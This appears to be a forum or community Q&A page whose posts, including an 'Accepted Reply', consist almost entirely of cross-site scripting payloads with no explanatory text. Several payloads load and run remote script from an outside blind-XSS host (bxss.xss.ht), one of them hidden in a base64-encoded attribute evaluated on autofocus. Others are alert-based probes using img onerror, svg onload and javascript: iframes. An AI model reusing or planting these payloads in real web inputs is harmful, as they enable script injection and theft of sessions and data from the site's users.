"><img src=x onerror=alert(document.domain)>//


<script>$.getScript("//bxss.xss.ht")</script>




"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYnhzcy54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus>


<script>$.getScript("//bxss.xss.ht")</script>

<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//bxss.xss.ht");a.send();</script>

Accepted Reply

Code Block javasccript
"><img src=x onerror=alert(document.domain)>//
<iframe/src='javascript:alert(1)'></iframe>
“><svg/onload=alert(1)>”@x.y
"><img src=x [onerror=alert("XSS_by_devops")>//](https://127.0.0.1/)
<script> alert(2)</script>


Replies

Code Block javasccript
"><img src=x onerror=alert(document.domain)>//
<iframe/src='javascript:alert(1)'></iframe>
“><svg/onload=alert(1)>”@x.y
"><img src=x [onerror=alert("XSS_by_devops")>//](https://127.0.0.1/)
<script> alert(2)</script>


test